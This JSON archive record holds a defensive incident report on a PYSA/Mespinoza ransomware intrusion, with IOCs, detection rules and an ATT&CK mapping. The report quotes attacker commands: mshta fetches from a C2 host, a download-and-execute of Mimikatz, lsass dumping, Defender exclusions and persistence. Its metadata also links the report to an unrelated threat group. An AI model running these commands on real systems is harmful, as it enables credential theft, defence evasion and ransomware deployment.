{
	"id": "9a533194-1b55-43d8-83b2-c63ca595ebd9",
	"created_at": "2026-04-06T00:07:29.966834Z",
	"updated_at": "2026-04-10T03:24:24.413103Z",
	"deleted_at": null,
	"sha1_hash": "6f96e418062deb99420360f9b5a69a30067da8e4",
	"title": "PYSA/Mespinoza Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1150690,
	"plain_text": "PYSA/Mespinoza Ransomware\r\nBy editor\r\nPublished: 2020-11-23 · Archived: 2026-04-05 14:34:48 UTC\r\nIntro\r\nOver the course of 8 hours the PYSA/Mespinoza threat actors used Empire and Koadic as well as RDP to move\r\nlaterally throughout the environment, grabbing credentials from as many systems as possible on the way to their\r\nobjective. The threat actors took their time, looking for files and reviewing the backup server before executing\r\nransomware on all systems. Hours after being ransomed, our files were opened from multiple Tor exit nodes,\r\nwhich confirms our suspicion that files had been exfiltrated. PYSA/Mespinoza seemed to make its big splash\r\nwhen CERT-FR published a report on intrusions back in March 2020. This group has been in business going back\r\nas far as 2018 but recently the group seems to be picking up pace as one of the up and coming big game hunters as\r\nnoted in Intel 471’s recent report.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: 20+ private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver,\r\netc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor\r\nInsights reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nCase Summary\r\nIn this intrusion the entry was a Windows host with RDP exposed to the internet. The threat actors logged in with\r\na valid account (Domain Administrator). 
The login was from a Tor exit node and over the course of an 8-hour intrusion we saw them hand off 2 times, for a total of 3 different Tor exits being used to maintain RDP access to the environment. The account used to access the first beachhead host had enough privileges to immediately begin lateral movement to a domain controller just minutes after entry. Network scanning began on the domain controller, followed closely by Empire. While the Empire C2 remained active during the whole intrusion, we saw little activity from it, more like a fallback channel should their RDP access fall off. As they started to move laterally to other systems, it was very obvious they were following a checklist playbook. Each time they pivoted, they would check quser, and then dump lsass using Task Manager. During the intrusion we saw the PYSA threat actors attempt to access credentials via the following techniques:\r\n
https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\nPage 1 of 18\n\n
Dump lsass with Task Manager\r\nDump lsass with Procdump\r\nDump lsass with comsvcs.dll\r\nDump credentials with Invoke-Mimikatz\r\nExtract the shadow copy of the ntds.dit from the domain controller\r\nExtract and decode backup system credentials from a SQL database\r\nAccess LSA Secrets\r\n
Most lateral movement in the environment was via RDP with various legitimate user accounts, as well as PsExec to execute scripts throughout the environment for credential dumping and collection activity. The threat actor disabled security tools throughout the intrusion by using Local Security Policy Editor and MpPreference to disable Defender. PowerShell Remoting was also used to run the arp command on a few systems. Besides using RDP and Empire, the group also used the Offensive Security Tool (OST) Koadic, which bills itself as a post-exploitation toolkit that can stay resident in memory using JScript or VBS via Windows Script Host to perform its execution. Koadic was only utilized on a few key servers, and one of those servers included a persistence mechanism using the default Koadic HTA scheduled task module. Around 7 hours after initial access, the threat actors began their final actions by RDPing into systems, dropping a PowerShell script and the ransomware executable. The PowerShell script killed various active processes, made sure RDP was open at the firewall and created what appears to be a potentially unique identifier for systems. After that, the ransomware would be run to encrypt the system. After the encryption was done we were able to confirm exfiltration occurring by receiving a callback from a canary document. The threat actors asked for 5 BTC or around $88,000 USD, which tells us these attackers most likely base their ransom demand on the information exfiltrated.\r\n
Timeline\r\n
MITRE ATT\u0026CK\r\n
Initial Access\r\n
Initial access for this actor was via exposed RDP services. Originally, the actor connected from 198.96.155.3, and then performed a kind of hand off over the course of the campaign, first to 23.129.64.190 and then finally 185.220.100.240. All 3 of these IPs belong to the Tor network and function as exit nodes.\r\n
Execution\r\n
The threat actors started off by using RDP but also relied on 2 different OSTs during this intrusion. A few minutes after gaining access, they moved laterally to a domain controller and then executed a PowerShell launcher for Empire.\r\n
Later during the intrusion, the threat actors employed another OST named Koadic. To execute Koadic, they employed an MSHTA launcher with JavaScript.\r\n
mshta http://45.147.231.210:9999/8k6Mq\r\nmshta http://45.147.231.210:9999/VtgyT\r\n
From those two executions, various child processes were created to load stage 2 into memory.\r\n
Persistence\r\n
Persistence was set up using Koadic to schedule a task to execute an HTA file located in the C:\\ProgramData directory at logon as SYSTEM. This will initiate C2 back to the Koadic server.\r\n
schtasks /create /tn K0adic /tr \"C:\\Windows\\system32\\mshta.exe C:\\ProgramData\\SZWXNUHHDP.hta\" /sc onl\r\n
Defense Evasion\r\n
The threat actors disabled Windows Defender using Local Group Policy Editor.\r\n
Later, they also ran a PowerShell script that would again disable Windows Defender, this time using MpPreference. The script also targeted Malwarebytes, agents, Citrix, Exchange, Veeam, SQL and many other processes. Event ID 5001 was created due to Defender AV Real-Time being disabled.\r\n
A Defender exclusion was also added to exclude everything with .exe as the extension.\r\n
Add-MpPreference -ExclusionExtension \".exe\"\r\n
Event ID 5007\r\nWindows Defender Antivirus Configuration has changed. If this is an unexpected event you should revie\r\nOld value:\r\nNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\.exe = 0x0\r\n
Credential Access\r\n
The threat actors displayed multiple techniques for gathering credentials during this intrusion. Credentials were dumped manually via Task Manager as they RDPed into each system.\r\n
While established on a domain controller the threat actors also created and accessed a shadow copy of the ntds.dit and most likely exfiltrated it via their Koadic C2 channel.\r\n
Event ID 1917 (The shadow copy backup for Active Directory Domain Services was successful) was logged to the Directory Service event log on the domain controller. The threat actors also executed a PowerShell script across the environment using PsExec that took advantage of comsvcs.dll to dump the lsass process and then copy the dump back to their pivot position on a domain controller.\r\n
The threat actors tried using the Sysinternals ProcDump method but the executable was not present on the endpoint.\r\n
procdump.exe -accepteula -ma lsass.exe mem.dmp\r\n
The threat actors were focused on the backup server for quite a while as they dumped credentials from the 3rd party backup software repository. The first script pulls the hashes out of the database and the second decodes the password to plain text. Both scripts were run via PowerShell ISE.\r\n
The threat actors also ran Invoke-Mimikatz from BC-Security on one of the domain controllers.\r\n
IEX (New-Object Net.WebClient).DownloadString(\" https://raw.githubusercontent.com/BC-SECURITY/Empire/master/da\r\n
We also saw the threat actors save LSA Secrets to disk using the hashdump_sam module in Koadic, which runs impacket.\r\n
Inveigh was run on a domain controller.\r\n
Discovery\r\n
The threat actors leveraged many built-in Windows tools for discovery including the following:\r\n
quser.exe\r\nwhoami.exe /user\r\nnet.exe group /domain\r\nnet.exe group \"Domain Users\" /domain\r\nnltest.exe /dclist:\r\narp -a\r\n
The arp command was run using PowerShell Remoting.\r\n
They also reviewed a few admin tools while exploring the network including:\r\n
mmc.exe C:\\Windows\\system32\\dnsmgmt.msc\r\nmmc.exe C:\\Windows\\system32\\domain.msc\r\nmmc.exe C:\\Windows\\system32\\compmgmt.msc /s\r\nmmc.exe C:\\Windows\\system32\\gpedit.msc\r\nmmc.exe C:\\Windows\\system32\\diskmgmt.msc\r\nmmc.exe C:\\Windows\\system32\\wbadmin.msc\r\nveeam.backup.shell.exe\r\n
The threat actors also brought some tools of their own to aid in discovery tasks including Advanced Port Scanner and ADRecon. Here’s the description of ADRecon.\r\n
Other local discovery was performed using PowerShell, such as ps to list the running processes on systems.\r\n
Lateral Movement\r\n
The first lateral movement occurred just 3 minutes after the initial access by the threat actor. RDP was initiated from the beachhead host to a domain controller using the valid account they had used to gain access to the first host. RDP continued to be the first method of choice while accessing various systems around the environment.\r\n
After a few hours in, the threat actors decided to automate some credential collection and used PsExec to execute a PowerShell script that called comsvcs.dll for lsass dumping.\r\n
PsExec.exe -d \\\\HOST -u \"DOMAIN\\USER\" -p \"PASSWORD\" -accepteula -s cmd /c \"powershell.exe -ExecutionP\r\n
Command and Control\r\n
The threat actors used 3 different C2 channels: RDP, PowerShell Empire, and Koadic. IPs used to maintain access over RDP:\r\n
198.96.155.3\r\n23.129.64.190\r\n185.220.100.240\r\n
Empire\r\n
194.36.190.74:443\r\nCertificate [b8:20:c2:db:b6:b8:f4:0f:61:a5:c0:27:40:89:e6:30:cd:db:05:5e ]\r\nNot Before 2020/09/17 18:38:42\r\nNot After 2021/09/17 18:38:42\r\nPublic Algorithm rsaEncryption\r\nJA3: 5e12c14bda47ac941fc4e8e80d0e536f\r\nJA3s: 0eec924176fb005dfa419c80ab72d27c\r\n
Koadic 45.147.231.210:9999 C2 Check-in\r\nCommand execution\r\n
Exfiltration\r\n
While no plain text exfiltration was seen during this intrusion, canary documents were opened by the threat actors hours after the ransom, confirming that the hours spent on the network before ransoming were used to gather files. The source IPs from these canary documents were also Tor exit nodes, just like the RDP connections. Since no plaintext exfil was observed, we assess that the exfiltration was performed via one of the command and control channels, either RDP, Empire, or Koadic.\r\n
Impact\r\n
Around the 7.5 hour mark the threat actors began ransom deployment. Two files were dropped via RDP on each system, a PowerShell script and a PYSA ransomware executable.\r\n
C:\\Users\\USER\\Downloads\\svchost.exe\r\nC:\\Users\\USER\\Downloads\\p.ps1\r\n
The purpose of the PowerShell script was to disable security tools that might not have been disabled throughout the intrusion. Additionally, the script would kill many server and database processes, allowing encryption of files that might otherwise be locked by running processes.\r\n
Finally, the ransomware exe was executed and the systems ransomed.\r\n
Enjoy our report? Please consider donating $1 or more to the project using Patreon. Thank you for your support!\r\nWe also have pcaps, files, memory images, and Kape packages available here.\r\n
IOCs\r\n
MISP Priv https://misppriv.circl.lu/events/view/81105\r\nOTX https://otx.alienvault.com/pulse/5fbb23c7dfc6aa0ffd92d27f\r\n
Network\r\n
198.96.155.3\r\n23.129.64.190\r\n185.220.100.240\r\nhttp://45.147.231.210:9999/8k6Mq\r\nhttp://45.147.231.210:9999/VtgyT\r\n45.147.231.210\r\n194.36.190.74\r\nhttps://194.36.190.74\r\n
File\r\n
svchost.exe\r\nbd395971a7eb344673de513a15c16098\r\n1db448b0f1adf39874d6ea6b245b9623849f48e5\r\ndf0cd6a8a67385ba67f9017a78d6582db422a137160176c2c5c3640b482b4a6c\r\n
p.ps1\r\n2df8d3581274a364c6bf8859c9bdc034\r\n8af4bfcef0f3fefae3f33b86815a6f940b64f4b7\r\neb1d0acd250d32e16fbfb04204501211ba2a80e34b7ec6260440b7d563410def\r\n
p.ps1\r\n1da1f49900268fa7d783feda8849e496\r\n72f2352eab5cb0357bdf5950c1d0374a19cfdf99\r\n0ab8f14e2c1e6f7c4dfa3d697d935d4fbef3605e15fd0d489d39b7f82c84ba7e\r\n
XEKFGUIQQB.hta\r\n5266daf58dd34076e447474c7dce09b2\r\nb0197a53a56939d3d9006df448bc46ef599bac31\r\n81e0d5945ab7374caf2353f8d019873c88728a6c289884a723321b8a21df3c77\r\n
Detections\r\n
Network\r\n
ETPRO TROJAN Win32/Koadic CnC Checkin\r\nETPRO TROJAN Koadic Command Execution via CnC\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY Outbound MSSQL Connection to Non-Standard Port - Likely Malware\r\nET SCAN NMAP SIP Version Detect OPTIONS Scan\r\nET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)\r\nGPL SNMP public access udp\r\nET SCAN Behavioral Unusual Port 139 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET SCAN Potential SSH Scan OUTBOUND\r\n
Sigma\r\n
win_hack_koadic\r\nwin_mshta_spawn_shell\r\nwin_susp_whoami\r\nwin_local_system_owner_account_discovery\r\nwin_susp_schtask_creation\r\nwin_susp_powershell_empire_launch\r\nsysmon_susp_vssadmin_ntds_activity\r\n
Yara\r\n
/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2020-11-16\r\nIdentifier: Case 1010\r\nReference: https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule mespinoza_svchost {\r\nmeta:\r\ndescription = \"files - svchost.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-11-16\"\r\nhash1 = \"df0cd6a8a67385ba67f9017a78d6582db422a137160176c2c5c3640b482b4a6c\"\r\nstrings:\r\n$s1 = \".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP@@V?$TF_Base@VRandomizedTrapdoorFunction@Crypt\r\n$s2 = \"protonmail.com\" fullword ascii\r\n$s4 = \"update.bat\" fullword ascii\r\n$s5 = \".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$0A@VEnc@Rijndael@CryptoPP@@@C\r\n$s6 = \".?AV?$AlgorithmImpl@VCBC_Encryption@CryptoPP@@V?$CipherModeFinalTemplate_CipherHolder@V?$Block\r\n$s7 = \".?AV?$TF_ObjectImplBase@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@C\r\n$s8 = \".?AV?$TF_ObjectImpl@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@Crypto\r\n$s9 = \".?AV?$TF_EncryptorImpl@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@CryptoP\r\n$s10 = \".?AV?$TF_EncryptorImpl@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@Crypto\r\n$s11 = \".?AV?$TF_ObjectImplBase@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@C\r\n$s12 = \".?AV?$AlgorithmImpl@VTF_EncryptorBase@CryptoPP@@V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@CryptoP\r\n$s13 = \".?AV?$TF_ObjectImpl@VTF_EncryptorBase@CryptoPP@@U?$TF_CryptoSchemeOptions@V?$TF_ES@URSA@Crypt\r\n$s14 = \"Check out our website, we just posted there new updates for our partners:\" fullword ascii\r\n$s15 = \"Also, be aware that we downloaded files from your servers and in case of non-payment we will\r\n$s16 = \"E3AF7F517600CD3B9006519EA9E24F65CE0318C3F326A20C1C73F644F32C4CDCEE7A398153C29C4B844A7388D6394\r\n$s17 = \"30820220300D06092A864886F70D01010105000382020D003082020802820201009A673A7A8FD521FAE7C950BDFAA\r\n$s18 = \"A76229D9DAD792BF87826DBE0FFED40E7CEE781DF4E8B4AF086E21D41CE0912DAC6252A512B4C81F98E46F1268F7C\r\n$s19 = \"CE012C93EC57B77DB5D9D4C345E7F3A2564C09E728C8B88CCD6A824C070EDDA34DA7082665B0732783868CE38C5F2\r\n$s20 = \": ;+;6;?;E;\" fullword ascii /* hex encoded string 'n' */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"b5e8bd2552848bb7bf2f28228d014742\" or 8 of them )\r\n}\r\n
MITRE\r\n
External Remote Services – T1133\r\nValid Accounts – T1078\r\nGraphical User Interface – T1061\r\nMshta – T1218.005\r\nPowerShell – T1059.001\r\nLocal Account – T1087.001\r\nRemote System Discovery – T1018\r\nFile and Directory Discovery – T1083\r\nDomain Trust Discovery – T1482\r\nAccount Discovery – T1087\r\nScheduled Task – T1053.005\r\nLateral Tool Transfer – T1570\r\nSMB/Windows Admin Shares – T1021.002\r\nRemote Desktop Protocol – T1021.001\r\nCredential Dumping – T1003\r\nLSASS Memory – T1003.001\r\nProcess Discovery – T1057\r\nStandard Application Layer Protocol – T1071\r\nExfiltration Over C2 Channel – T1041\r\nData Encrypted for Impact – T1486\r\nRundll32 – T1218.011\r\n
Internal case 1010\r\n
Source: https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/"
	],
	"report_names": [
		"pysa-mespinoza-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434049,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f96e418062deb99420360f9b5a69a30067da8e4.pdf",
		"text": "https://archive.orkl.eu/6f96e418062deb99420360f9b5a69a30067da8e4.txt",
		"img": "https://archive.orkl.eu/6f96e418062deb99420360f9b5a69a30067da8e4.jpg"
	}
}